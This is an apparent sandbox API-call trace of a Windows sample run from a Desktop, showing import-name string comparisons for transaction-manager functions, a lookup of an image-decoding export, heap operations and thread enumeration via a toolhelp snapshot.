[0156.949] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0156.949] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0156.949] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0156.949] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0156.949] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0156.949] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0156.949] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0156.949] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0157.028] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0157.028] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0157.028] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0157.029] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0157.029] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0157.029] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0157.029] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0157.029] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0157.030] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.030] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0157.031] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.031] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0157.031] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0157.031] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0157.031] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0157.032] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0157.032] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0157.032] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0157.032] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0157.032] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0157.033] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0157.033] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.034] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0157.035] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0157.035] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0157.036] GetProcessHeap () returned 0x4d0000 [0157.036] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c45030 | out: hHeap=0x4d0000) returned 1 [0157.045] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0157.045] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0157.046] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x1000) returned 0x2c45030 [0157.048] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x16) returned 0x4e92d0 [0157.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_decode", cchWideChar=-1, lpMultiByteStr=0x4e92d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_decode", lpUsedDefaultChar=0x0) returned 11 [0157.048] GetLastError () returned 0x0 [0157.048] SetLastError (dwErrCode=0x0) [0157.048] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decodeW") returned 0x0 [0157.048] GetLastError () returned 0x7f [0157.048] SetLastError (dwErrCode=0x7f) [0157.048] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decodeA") returned 0x0 [0157.048] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_decode") returned 0x7ffc45f19e50 [0157.048] GetActiveWindow () returned 0x0 [0157.048] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c45030 | out: hHeap=0x4d0000) returned 1 [0157.048] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e92d0 | out: hHeap=0x4d0000) returned 1 [0157.048] GetCurrentProcessId () returned 0xd48 [0157.049] GetCurrentThreadId () returned 0xfc0 [0157.049] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0157.060] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.168] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.169] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.170] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.171] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.172] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.173] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.174] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.175] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.176] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.177] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0157.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 